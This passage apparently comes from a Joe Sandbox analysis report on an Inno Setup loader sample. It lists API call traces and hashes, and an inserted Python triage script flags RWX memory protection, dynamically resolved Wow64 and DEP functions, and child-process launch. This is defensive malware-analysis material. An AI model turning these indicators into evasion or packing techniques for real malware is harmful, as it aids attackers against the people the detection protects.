                                                                                • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                • API String ID: 3256987805-3653653586
                                                                                • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • SetLastError.KERNEL32 ref: 0040AAC1
                                                                                  • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,020D246C), ref: 0040966C
                                                                                • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                • SetWindowLongA.USER32(0002047E,000000FC,00409960), ref: 0040AB15
                                                                                • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                • DestroyWindow.USER32(0002047E,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
                                                                                • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                • API String ID: 3757039580-3001827809
                                                                                • Opcode ID: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                • Instruction ID: 81987b3bab642c92fe87a7372e0454594c4b8fe140ce311e0f93b1eeebf6ab37
                                                                                • Opcode Fuzzy Hash: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                • Instruction Fuzzy Hash: 25412E70604204DBDB10EBA9EE89B9E37A5EB44304F10467FF510B72E2D7B89855CB9D

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090DE
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                • API String ID: 1646373207-2130885113
                                                                                • Opcode ID: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                • Instruction ID: 214dda5481ef482ebe311b1329301f35405b1013d97e3062c17ffb2c8286d57d
                                                                                • Opcode Fuzzy Hash: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                • Instruction Fuzzy Hash: 21017C70748342AEFB00BB76DD4AB163A68E785704F60457BF640BA2D3DABD4C04D66E
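                                                                                The three "APIs" blocks above (the VirtualQuery/VirtualProtect walk at 00409B78, the SetProcessDEPPolicy resolution at 00404582 and the Wow64 file-system-redirection resolution at 004090C4) are the lines an analyst reads first when confirming the "changes PE section rights" verdict. The following is an added triage helper, written for this page and not part of the Joe Sandbox report or of the sample; it parses report lines in the exact shape shown above, flags a VirtualProtect whose third argument is 0x40 (PAGE_EXECUTE_READWRITE), collects the API names the loader resolves at run time, and notes the DEP-enable and child-process pattern. The sample input is copied from the report lines above; the watchlist of resolved names and the record layout are this example's own choices.

```python
import re
from collections import Counter

# Joe Sandbox "APIs" lines, copied verbatim from the report blocks above (constructed sample input).
SAMPLE_API_LINES = """
• GetSystemInfo.KERNEL32(?), ref: 00409B8A
• VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
• VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
• VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
• VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18
• GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
• GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
• GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
• SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6
• SetLastError.KERNEL32 ref: 0040AAC1
  • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,020D246C), ref: 0040966C
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020D246C,00409AD8,00000000,00409ABF), ref: 00409A5C
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
"""

# One report line: optional bullet, optional "Part of subcall function XXXXXXXX:" prefix,
# "Api.MODULE(arg,arg,...)" (the argument list may be absent), then ", ref: XXXXXXXX".
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<parent>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Names whose run-time resolution via GetProcAddress is worth calling out (example watchlist).
DYNAMIC_IMPORT_WATCHLIST = {
    "Wow64DisableWow64FsRedirection", "Wow64RevertWow64FsRedirection",
    "SetProcessDEPPolicy", "SetDllDirectoryW", "SetSearchPathMode",
}
PAGE_EXECUTE_READWRITE = "00000040"   # winnt.h protection constant as printed in the report's hex column
PROCESS_DEP_ENABLE = "00000001"       # first argument of SetProcessDEPPolicy


def parse_api_lines(text):
    """Return one record per parsable API line; unparsable lines are skipped."""
    records = []
    for raw in text.splitlines():
        m = API_LINE.match(raw)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        records.append({"api": m["api"], "module": m["module"], "args": args,
                        "ref": m["ref"], "parent": m["parent"]})
    return records


def triage(records):
    """Apply the triage rules and return a findings dict."""
    findings = {"rwx_protect_refs": [], "dynamic_imports": set(),
                "dep_enabled": False, "child_process": False, "api_counts": Counter()}
    for r in records:
        findings["api_counts"][r["api"]] += 1
        # VirtualProtect(lpAddress, dwSize, flNewProtect, lpflOldProtect): only the positional
        # third argument counts, because trailing hex values are stack residue (see ref 00409C08).
        if r["api"] == "VirtualProtect" and len(r["args"]) >= 3 and r["args"][2] == PAGE_EXECUTE_READWRITE:
            findings["rwx_protect_refs"].append(r["ref"])
        # The resolved name may sit on the GetModuleHandleA line rather than the GetProcAddress
        # line (ref 004090C4 vs 004090CA), so match the watchlist anywhere in either line's args.
        if r["api"] in ("GetProcAddress", "GetModuleHandleA"):
            findings["dynamic_imports"].update(a for a in r["args"] if a in DYNAMIC_IMPORT_WATCHLIST)
        if r["api"] == "SetProcessDEPPolicy" and r["args"][:1] == [PROCESS_DEP_ENABLE]:
            findings["dep_enabled"] = True
    seen = set(findings["api_counts"])
    findings["child_process"] = "CreateProcessA" in seen and "MsgWaitForMultipleObjects" in seen
    return findings


def report(findings):
    """Render the findings as plain text lines for an analyst."""
    lines = []
    for ref in findings["rwx_protect_refs"]:
        lines.append(f"RWX: VirtualProtect(PAGE_EXECUTE_READWRITE) at {ref} (self-modifying / unpacking indicator)")
    for name in sorted(findings["dynamic_imports"]):
        lines.append(f"Dynamic import resolved at run time: {name}")
    if findings["dep_enabled"]:
        lines.append("SetProcessDEPPolicy(PROCESS_DEP_ENABLE) called: DEP enabled for the process")
    if findings["child_process"]:
        lines.append("CreateProcessA followed by MsgWaitForMultipleObjects: launches and waits for a child")
    return lines


if __name__ == "__main__":
    for line in report(triage(parse_api_lines(SAMPLE_API_LINES))):
        print(line)
```

                                                                                The second VirtualProtect (ref 00409C08) is deliberately not flagged: its third argument is unknown ("?") and the 00000040 further along is the leftover from the first call, which the control-flow graph above shows as the protection-restore step after the call into 00409B70.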

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                • SetWindowLongA.USER32(0002047E,000000FC,00409960), ref: 0040AB15
                                                                                  • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040AB86,?), ref: 00406B94
                                                                                  • Part of subcall function 004099EC: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020D246C,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                  • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020D246C,00409AD8,00000000), ref: 00409A70
                                                                                  • Part of subcall function 004099EC: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                  • Part of subcall function 004099EC: GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                  • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020D246C,00409AD8), ref: 00409AA4
                                                                                • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                • DestroyWindow.USER32(0002047E,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                • API String ID: 3586484885-3001827809
                                                                                • Opcode ID: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                • Instruction ID: d3376fcde1141b4290a3dca450fc2844fa47922897975e075ebf06e3b6db64eb
                                                                                • Opcode Fuzzy Hash: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                • Instruction Fuzzy Hash: 77411A71604204DFD714EBA9EE85B5A37B5EB48304F20427BF500BB2E1D7B8A855CB9D

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020D246C,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020D246C,00409AD8,00000000), ref: 00409A70
                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                • GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020D246C,00409AD8), ref: 00409AA4
                                                                                  • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,020D246C), ref: 0040966C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                • String ID: D
                                                                                • API String ID: 3356880605-2746444292
                                                                                • Opcode ID: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                • Instruction ID: b58d0f6e2b8975977e6c7b71aada5392bea55c03070ce9fad3dcef5aa6d4018a
                                                                                • Opcode Fuzzy Hash: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                • Instruction Fuzzy Hash: EE1142B16402486EDB00EBE6CC42F9EB7ACEF49714F50013BB604F72C6DA785D048A69

                                                                                Control-flow Graph

                                                                                (Graph rendering not reproduced: the function at 00401918 calls RtlInitializeCriticalSection, optionally RtlEnterCriticalSection at 40193c, makes three calls to 004012DC and one LocalAlloc in the block at 401946, runs a short self-loop at 401983, and calls RtlLeaveCriticalSection at 4019c3 before returning. The executed/not-executed colouring of the blocks is lost.)
                                                                                APIs
                                                                                • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                • String ID:
                                                                                • API String ID: 730355536-0
                                                                                • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Message
                                                                                • String ID: .tmp$y@
                                                                                • API String ID: 2030045667-2396523267
                                                                                • Opcode ID: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                • Instruction ID: 5e9257013af3d55ef2b6e359c41f87f67318ae2a4e6dbf07461b5d8c6de74657
                                                                                • Opcode Fuzzy Hash: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                • Instruction Fuzzy Hash: 3B41C030704200CFD311EF25DED1A1A77A5EB49304B214A3AF804B73E1CAB9AC11CBAD

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Message
                                                                                • String ID: .tmp$y@
                                                                                • API String ID: 2030045667-2396523267
                                                                                • Opcode ID: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                • Instruction ID: 95bba075cf9db07042691c1556ef0613dbe482a65a3614fff4d0ead14828e6f7
                                                                                • Opcode Fuzzy Hash: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                • Instruction Fuzzy Hash: E341BE30700200DFC711EF65DED2A1A77A5EB49304B104A3AF804B73E2CAB9AC01CBAD

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectoryErrorLast
                                                                                • String ID: .tmp
                                                                                • API String ID: 1375471231-2986845003
                                                                                • Opcode ID: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                • Instruction ID: b240cf9bc22f775501a2d99da134be40bb2f76fb21a7d6e050461713caae6e8b
                                                                                • Opcode Fuzzy Hash: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                • Instruction Fuzzy Hash: 9E216774A00208ABDB05EFA1C8429DFB7B8EF88304F50457BE901B73C2DA3C9E058A65

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                • Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
                                                                                • Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                • Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
                                                                                  • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                  • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                  • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                  • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                • String ID:
                                                                                • API String ID: 296031713-0
                                                                                • Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                • Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
                                                                                • Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                • Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLibraryLoadMode
                                                                                • String ID:
                                                                                • API String ID: 2987862817-0
                                                                                • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                                APIs
                                                                                • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020D03AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$FilePointer
                                                                                • String ID:
                                                                                • API String ID: 1156039329-0
                                                                                • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastRead
                                                                                • String ID:
                                                                                • API String ID: 1948546556-0
                                                                                • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                                APIs
